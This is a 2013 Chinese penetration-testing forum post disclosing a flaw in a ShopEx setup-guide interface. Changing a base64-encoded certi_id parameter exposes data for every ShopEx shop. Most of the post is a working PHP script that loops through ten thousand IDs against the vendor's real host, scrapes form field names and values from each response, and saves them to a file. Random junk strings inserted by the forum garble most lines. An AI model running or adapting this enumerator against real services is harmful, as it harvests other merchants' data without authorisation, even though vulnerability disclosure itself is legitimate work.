中国网络渗透测试联盟

标题: ShopEx某接口缺陷可遍历所有用户网站 [打印本页]
作者: admin    时间: 2013-9-21 15:59
标题: ShopEx某接口缺陷可遍历所有用户网站
简要描述:
) @% E! N/ g1 h8 mShopEx某接口缺陷,可遍历所有网站
2 D- I* A: G3 I9 b( I详细说明:: I; u1 G2 M8 y# i7 S' v, S
问题出现在shopex 网店使用向导页面
* o! i. {3 `, M) J$ X% \6 N4 e; G- u% C' y6 p- i8 g

& I+ F6 J" Y  V' G5 ?8 y/ ^
0 O* a' W0 _* w' X7 u; N* v; e! z% ?- [http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
0 }* j6 H% \8 ^' v9 j- f0 _0 ]5 _+ S5 X8 Q6 }7 V

8 M# S" l: c& p. f
& D5 [) l8 r$ y0 grefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}  w, @' W$ e/ r" Y# H. w
. t' A$ @1 P9 o3 D0 d8 ]9 O' T6 v0 E
8 w  m+ ?6 ^& N" F. I

; }3 E2 x+ a6 v7 A$ M, R+ W我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 0 y5 F" y8 m& L0 ~7 ^9 C
. I4 J1 a& v% }

# Y" G$ Q( I! U' ?, J( k
' J" I' s2 z3 K" O6 E, |<?php5 N. N' E- e/ ~; E3 K
; g  _+ L/ X8 `& c
                for ($i=1; $i < 10000; $i++) { //遍历/ v& V4 r6 f& D# s

" N& |/ z; s2 o) `7 c; X                        ShowshopExD($i);- W3 K1 ]0 M( A0 c# Z3 l

$ C- m& T7 c0 |                }
- H4 j# J( d2 Y" L- d/ F) p$ s1 k2 p& @, _* G& C* H  H* y
                function ShowshopExD($cid) {) v. v2 r" S7 z# l; r1 A( M
# w! h) z7 X2 @( V2 P
                $url='http://guide.ecos.shopex.cn/step2.php';& U, e6 D( A% z$ t. Z
1 P+ f5 ?% I3 V9 ]1 ^- P; O
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');9 [5 B. e9 _9 O
8 z* Q$ r" `. u% D
        $url = $url.'?refer='.$refer;
+ O9 ?, H+ c9 ^; J. {" K4 C
4 U* i. _7 V: v" {* W        $ch = curl_init($url);! V$ m# g1 v) ^# K* _* W
- n4 w+ Y2 `. r" N; U6 x
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
0 W6 g+ y9 P: |" e) b4 l$ H' [% W) y) e7 k
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;+ a% k+ Y6 F& O
' P- j; {* n& u& ?4 {; K
        $result = curl_exec($ch);
4 Z7 O; g1 P6 P* _
. N8 o* a" N! o2 |# C        $result = mb_convert_encoding($result, "gb2312", "UTF-8");2 W4 ]0 j7 e0 B( `5 K
0 ]4 N# d3 C0 P3 |
        if(strpos($result,$refer))
/ U/ r) y; S# o/ c
% P5 k  k8 U; Z        {
9 k' O9 t) b7 A
1 L: k% n9 b  c& q8 p                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件, W  N. G5 q  o: o* L
. R/ n7 J2 w2 k: b+ w
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);. j, `; K' m# }# ~; e* v
, s" B( h9 X, i* N! `* A
                foreach ($value[1] as $key) {  a+ o2 W0 [0 R7 x

; Z5 C+ j0 Q( w* U                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);5 y" _' F; y% s0 b
! q' f$ M# o3 P
                        echo $res[1][0].':'.$res[3][0]."\r\n";
# G: F/ O* u6 V. A
! m7 k3 P! q+ r% M                        $col =$res[1][0].':'.$res[3][0]."\r\n";
: z/ f7 x7 Y7 a' v  J
% T' b5 v; H1 D$ G                        fwrite($fp, $col, strlen($col)); 5 X5 T, S$ b9 n$ E0 u4 E& G# B
; y5 Z$ V7 U6 e! x* Y9 {
                }
- C. V8 k1 O  Z' C9 T7 Z% a4 a$ }
                echo '--------------------------------'."\r\n";
0 h8 E% g2 Y; D. l; N, O- j5 E+ ^8 C& l- J% I
                fclose($fp);
& \# c. H, \; P7 K" Z/ o  _, ]* x" y5 @$ K
        }* T$ z" c+ B7 r& ~% t  o
/ T: U) Y9 `6 \( _4 A
        flush();
; Z9 d1 F$ n: c9 i9 z" b# X* T
2 T) y3 _; l' R- O        curl_close($ch);
3 b7 O( X# D( O* o
- e9 {! b; _7 m, G+ J$ t* O! Z, ~1 O                }
4 n& ~: c; r2 }3 a6 g/ o
% w4 @  f1 r/ q5 G2 I?>
' T! F. {6 D* n" P" {漏洞证明:
) z# `# d) w% s" }4 Y6 |http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg! @) T. z8 a3 F7 j& o. k9 ]
refer换成其他加密方式
. \' O7 r2 H, q5 E  ^



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2